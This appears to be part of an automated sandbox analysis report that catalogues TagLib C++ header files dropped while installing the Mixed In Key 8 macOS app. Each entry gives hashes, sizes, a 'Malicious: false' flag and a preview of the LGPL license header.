SSDEEP:	96:mJbD7AE3PqgLsmaVXeSSVYT+ATXaU4IwL1nXAmbAX3GWTE2Y7tmZKpZbkdx:iv7TigLsmaVXDSVYT+ATXaU4Iwpnwmsv
MD5:	A9DBF82E10AE23607A1D45A1DDF48DE5
SHA1:	20C3B7269B4CBA0D77DE7DA6F2D93500C047433C
SHA-256:	08070440F096BB2E07F090C0CD81DD38D2E429DD09B0A5882A833E000BCE58C6
SHA-512:	810F5C1FB3226E4BCFB2A055563D1CCAD8F292D40B163A531B9FC52BC47594FEA154AFD354B65D42433E68F8EF0AC8E6253D9059AB85E62AB857C6866F3E9BBA
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_70W1i4 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5193
Entropy (8bit):	4.298333676347026
Encrypted:	false
SSDEEP:	96:9GbUJ9CC4sHs8zshACUJs6MA1UKq1WnBEMVzJTDzJczsfdEcDeu:AoDCC4sHs8pFzKKq1OPVzJTDzJczsfdF
MD5:	58F17CBA9BB781E31FF5F89F351E15D6
SHA1:	643D972B65F22BA54FF581FBAD98215C3681DD9A
SHA-256:	2E0A808BCDFE006775EBE2DB49B9D72104217BDD18EF91772F31D55CB7D02ADD
SHA-512:	FBA85FDB7745F966DBEE29A28CD2566196534B179BE1AA683CB2A64AD5EBC60C5307A4B2612E086C404447444FA5734B7DCDE22E7A22490A72A9342E9500AAAD
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2008 by Scott Wheeler. email : wheeler@kde.org.***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_7Ce1EU Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5117
Entropy (8bit):	4.17048532102651
Encrypted:	false
SSDEEP:	96:9GbP0myrkbs7iRASlk5AWaDQ2mTSB1m+usEqs+NiosjtBRC:AL0myrkbs7iRASi5AWcQfTSB1m+uhqh3
MD5:	5325F341678D9E264B5687B2BBCB49B2
SHA1:	6B10959FD8A17AC6CF1E46584DBE8EDD8BE8D1D0
SHA-256:	5418833B6B270B4498EE9BF0DBED5EBC7BF4B991B36E9E4108C17C31E80950BA
SHA-512:	F3D7421025A0E269065EC960EA8E586BEDC53BA7093DA6CB1E05C9A2D80AD35B6B73D3B61497187F27AAE02D8BD2FA2BE6FC5E8E4B7D63FE7DD111650BFE0DA1
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2008 by Scott Wheeler. email : wheeler@kde.org.***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_7hKlYX Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	8113
Entropy (8bit):	4.3854357721952395
Encrypted:	false
SSDEEP:	192:XaPqxEWXV5qqSNY4bJROtGybJVKzAfr78M5rDmodnyYmVjs2fIjYg:XW5JU9J0mrKoUJRg
MD5:	DEE5F40556EF54F02AC2A7137612E982
SHA1:	EAE6B2880EC07933C59E39BFF25DA917222491E4
SHA-256:	4D76FB9CC293E91FF85A575A9B051D93068E384E171AD0C7E18F0C5321A2A571
SHA-512:	169F29368C294FEA9DE4D5D921C9D82DB6393B1E5ED2F6620E7C409B4C8F41914A0C8D61A334724328D7A0B4E44438B892ED0B6CDE365995872BFBFECB5DEDE1
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2010 by Alex Novichkov. email : novichko@atnet.ru.. copyright : (C) 2006 by Luk.. Lalinsk.. email : lalinsky@gmail.com. (original WavPack implementation).. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. (original MPC implementation). ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_8rMc2Z Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	7117
Entropy (8bit):	4.280676998202901
Encrypted:	false
SSDEEP:	192:jBSjBF337RiZY0u3eepYuCTpTJ8m+wB0u8WYk8bFMovw9IVIm:je7QYf
MD5:	DF75E9C52D00971D485E3D19CEBAB3A5
SHA1:	8FEA41E2005F7758785282BA5DA9FCA6F4471156
SHA-256:	67745E74F1CD524E64B0A914B5821D0BE475AFCFD74CDF3A33C0A3FC04763A8D
SHA-512:	792F7D8483B59D7A60EB59363EAB25534B212F89FBEBE7D2BC6793D661739126A971D4E7A24F5C28AF7FF0ADAB48A242C373F256EBDDBFACC7980370D1160302
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2010 by Anton Sergunov. email : setosha@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_93W6fe Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	6597
Entropy (8bit):	4.4303291227923856
Encrypted:	false
SSDEEP:	192:Dkclre6iipjI12xhqhCeeJv4VGAK0rTV1L4ew:DzroVWZ9N+I
MD5:	9D3352A0EA6A62C45961177E180E817A
SHA1:	FC7DB5F99BDB19750B2F29BFDA27B9511B3DA23D
SHA-256:	FCFAF1C29DBDCB868DD1D96A64C47EC86425262AC1A137B00B4BC00D0A901B10
SHA-512:	D005FFB66E3D475DE8ADAE9F049D9C541A78968955A6009C089D3DAC7899929F685AC7B67855E1AE82F661F91EB6276A3F7B5F2DEF67816AB7B61AA34625E166
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2012 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_9eRc4P Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	6260
Entropy (8bit):	4.264176880512891
Encrypted:	false
SSDEEP:	192:M9F337RiZYGtW5HwBEEUzP0ttPZtVKQe9YrEegNQ7rWfNT74esV2WYx:Mv7QY40
MD5:	E89555185AF2B4D9B3214F77C82EF852
SHA1:	A5F9FE380C369D499C8D60151AF5DD592E56E78B
SHA-256:	CC28DE2682CC05FFA0227042BE2981C2E81666619BD69850381FFD5391536106
SHA-512:	A6A21D11C117FFCE5041B06A6CC9671F7BF69E79592A884AC730303A443710ECFA0F8EABD159AAF40C623ED2C026DBF17ED7DA3E04605AD46C33CECB8357D635
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2010 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_AAoKkK Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	7459
Entropy (8bit):	4.756809096910263
Encrypted:	false
SSDEEP:	192:21NpDmdd1i3Ki8nPxQ4onXER9Hnk4oAxQj57miBHx9LzGlQt7QZNMK:20pi8a4o29HmSQkiRGeMZz
MD5:	4548BC51A0AD816DFBAD552C36CA2D75
SHA1:	052009F7A15E286B8FC3E16C5660A37E8E742389
SHA-256:	BF808BD2A4071C7CFFAB3BAE963C85311E96766819031F0F875F1AF2710EB111
SHA-512:	A7024BDE0F2BD3899E370618B9BAF1FD47F52378D5CE72FACB7D9EAD4EDC7825A28E0CB07EB48B10D4B500A6D5B18AF6F471FB266C56F35653C39ECB6ACAD2D3
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2013 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_AqwRCT Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5519
Entropy (8bit):	4.3504257356582965
Encrypted:	false
SSDEEP:	96:kob4PPnoAxqS6N8tMbXP5EpCAPRILEER/mEEx/lcEEQrzjXRzEZnDvTd:L0PPnoAxqS6N8tMbXP5EpCAJILtR/mt4
MD5:	2FAB58B8024E2D9D579F03EB6BE8AD82
SHA1:	44191B1E9F187C364F4991F4EE71037E4038E71C
SHA-256:	93B894F2DB6EB31C03FF43ACCD192291CCFC04F7D682319D5A9088DA59C686DD
SHA-512:	8B703EC5784289970858DEBA2050590E704AFBF08847916F7BEFE12D7AE61704AF49063C0DFE77D5DD3C8EA4D6339BBE17A3C7C3FC8874A2B1DEA65CA47A4FA6
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_AwIRfN Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	10981
Entropy (8bit):	4.399905988703116
Encrypted:	false
SSDEEP:	192:Lx/f4tfUo5yQnFMqyQhBW9azcBGhx8SoQ/WQXnsILHAet1Cq1jiq30Qah6+/a0vZ:LxboJRZcBGh1dXdD3ChxWu
MD5:	3D164E5473CB05E419731481982FEDB8
SHA1:	3ED4496B8C9B56C0C388FE0B267CF2D6189806A9
SHA-256:	2AB182DE9D1BE5E2C26D63887057E16F760E03B1538ED5BC5CD0D747BFB3A948
SHA-512:	40CC53BB9B212A7FF2668F7360872338E1EEADB8D918B0AFABA2D14A23E2521C20C66B57E71F8D2333F3B9FD55FD84B52CF8169A6E8E5511C0DB6CEE486AB883
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_BorFRN Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	5996
Entropy (8bit):	4.357755244132586
Encrypted:	false
SSDEEP:	96:fCbYqByuMlR2GVRq6Rrr7n0YmcURN8Rq7RNVRFGAVXFhjYWkAtiUCbMR/rTdv1uO:KkiyuMlA6Y6scU38E7LVbGAVXFhsWkAH
MD5:	C2EFF8DF3BC1493EE8B5817119719B50
SHA1:	08E997AC22335E59C21CC32148006B6BF0052258
SHA-256:	B9E6DD6E8813A112FFE8D4999C94B5E30AB083F15F6F8D1181C7780FA17C85A0
SHA-512:	517AF27900C385A06EE6F267E88B2C5205828501A7FFA7311EDDCE6754556F941E967BB2C8DF4564AE61A1EB6D2BD3B1DBC43C65988F1141F8B83A43CC2B0DDB
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2005-2007 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_BqpRJa Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	4407
Entropy (8bit):	4.351607386877128
Encrypted:	false
SSDEEP:	96:kob06nZXOAvsdG47/A2IwuoVD+FooSr9D:L3nZXOAvsdGA/A2IwuoVDmtoV
MD5:	8D53C1CEFD843120B38CDB2FEE2A2113
SHA1:	3B99E138781E1FBE5608F04F2696F18BA455627F
SHA-256:	0F26D7CA5FD39E67BE4F006923CC50DB05739FC5E1CFF83E7D6DF2934BA58E29
SHA-512:	CDD29E4A249E9E1194C079FC3B4CE9A420ED67B249BC1DFA6B8914E6C20372CD452C5ED98EC1CDE64CE2745DEA67C4FA0C5825B594637E0E6478A30F2597B81A
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_D2Ebgr Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	4662
Entropy (8bit):	4.265371385380305
Encrypted:	false
SSDEEP:	96:ZJbUii+QjJuWlMpw+ST4eezyR9++GUe9Cd8NPv4fM:zYii+QjYWapw+84XzyR9++GR9Cd8NPvR
MD5:	AD7B589828E41EEEBE339EA5D249A4CB
SHA1:	B5F6FBE315265E88A5F582AF76D1900146192300
SHA-256:	1AC4F964D01B0F08D2C2F8F4D86A1E445A54FA66BF6F215EBA4EB84A5962980F
SHA-512:	E5F8BF45669C88BCDFB82F25A214773D04D08A4011404875DF3C9093A1B19F5F2DB024C482AFFA604379E1F0E8832D46B3F3E6A579A71E37A59EE9CA8074FADB
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2003 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_D4ZVIk Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	3575
Entropy (8bit):	4.298881783076291
Encrypted:	false
SSDEEP:	24:8SWHjN57bfy9lOkHYg/TbVI2+RymPOFesuRjNHpsnUHD6I5qizdhoVHj7NZ7kmtu:KnTyBHbKjPOLudD15fzYFQmYNcW
MD5:	679DE168888C0CA7CEE0B0C6D4937CBB
SHA1:	38CF7EAFD7A0D73C08B45D779B11260062BBCC7E
SHA-256:	939AEF066CFBD615624867721C42EA1AEDA017B75765198CC0ECCCCF6455B02C
SHA-512:	997F3619DEDFFC4C36B396F4889121065A42B4AF1B99A3DA58474ADC794F9304316B9811B9828087EA0490A3E6449B8DDB9A2498EF40DE2B2FF72B47C8EB81C3
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Mathias Panzenb.ck. email : grosser.meister.morti@gmx.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_DZiGOW Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	9158
Entropy (8bit):	4.411832093027697
Encrypted:	false
SSDEEP:	192:mGPSxEq1VqHDq8cqSNn4bJOObJRsWfwV8l8M5rDmodnoem//s2jYAra:mCFJhJ4mrKo2zI7
MD5:	07C8D047941F80C65A108E47FF2CF227
SHA1:	620E0016FC7B6EC620A3FCDA187492340F73BAAD
SHA-256:	24DBA6F5FE252CA1F0FE6BCB54F069CFD5FCDA8FCB8521E0DD0620DAB8FCDBC1
SHA-512:	0380D8284EF88BAD935A6F5C2D6734B31789D90EF173F3AAB0363CC50451C418AAEE52F190B7C67CE2BD89A79ED1AF2060D6F886AFF2F18AEDC1D9B1B8FDD882
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2006 by Luk.. Lalinsk.. email : lalinsky@gmail.com.. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. (original MPC implementation). ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A P

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_EZpTcL Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	2570
Entropy (8bit):	4.192302946221823
Encrypted:	false
SSDEEP:	24:kDB7bfy9lOkHYg/TbVI2+RymPOFestJnO6fysBLGhDVVf34pLDVVf34F:ktTyBHbKjPOLS6ace8F8F
MD5:	772E512253C3CAF8596EE696B12E7998
SHA1:	F48CB436BB0192FC0DADD272512C1DDF89C9167D
SHA-256:	76915C60B93336E8CB211E7F55E1D729C3CBA5A1AC96322D0BEA25B195B8340A
SHA-512:	43A96310697F59254966E7CBDF923784DAAD2A9C2924C323D78171FE1B5C011A933672F6BD961095997885FE123AF9128E68437FE281820AB8CEF40FFA58A43F
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_FizdJQ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4153
Entropy (8bit):	4.251301784971283
Encrypted:	false
SSDEEP:	96:KybZGZMkCCcTMk6/1cKqwzJImzJRzNxJf8R:1FG0jiSKqwzJImzJRzNxJE
MD5:	05DB2E00E04E04A3B5B3300A436AD632
SHA1:	C9698721136B014543ECF211361298506EE483B3
SHA-256:	23ADB09B17EB5AA78A80A2037A87B85C5A2E6743C61C83178BEE07B2C97241DB
SHA-512:	EA336073669537A42ED844D503957E1C27B011F943317D9018606110BA6FE998DA8FF830B877DAB014328A5703799174EB753F63E924E28B15022ADA47FC6CAE
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Mathias Panzenb.ck. email : grosser.meister.morti@gmx.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_FqjRod Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4041
Entropy (8bit):	4.320679736541781
Encrypted:	false
SSDEEP:	96:KybbRd0U6q0X0USvd0qS4bJgObJpLyapHcEG:1nRwbGiqS4bJgObJpLyalm
MD5:	431ED75810E2C303CF358070FF09DDD8
SHA1:	7C900555F6A2679CC6E6887FAFA02B3B4844D17D
SHA-256:	29E2126FA618E6A94E97EEFBFD0F63A95E2D04C007A8D4C1463CEEDF2B6D7A11
SHA-512:	91BDD28CD51A1CFB75FCFD3C39C588A9B5208C41CECA4CD4162BDAEEAB012088E32DD5259FB0C4948E8D2055AAC9042E0635DB198980758684D0040E67B6BB96
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Mathias Panzenb.ck. email : grosser.meister.morti@gmx.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_G0VsJj Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	4517
Entropy (8bit):	4.2993051515206036
Encrypted:	false
SSDEEP:	96:kob2a0c9yuXUuN8dc4YT+uhvmN4TvpEIjG:Lcc9yukuN8dc4YyuhvmN4DpEIjG
MD5:	2E00C3CB54C69BEA6FC4215921C96132
SHA1:	265679351E50B478631D2A785F7D3E9D12AC4A22
SHA-256:	4109AD23403338FB1E7D54DE568F38280413F407C9F5D960D754BC1CDE47ABD6
SHA-512:	0F6A9A84994D51F40DFB0A88B37C330CA2A7A15919E92738B8BFCAE06C77B347961618F17CF7738DCA26F459BF4521941823346D6F66AFB00BC0BF693DACFB13
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

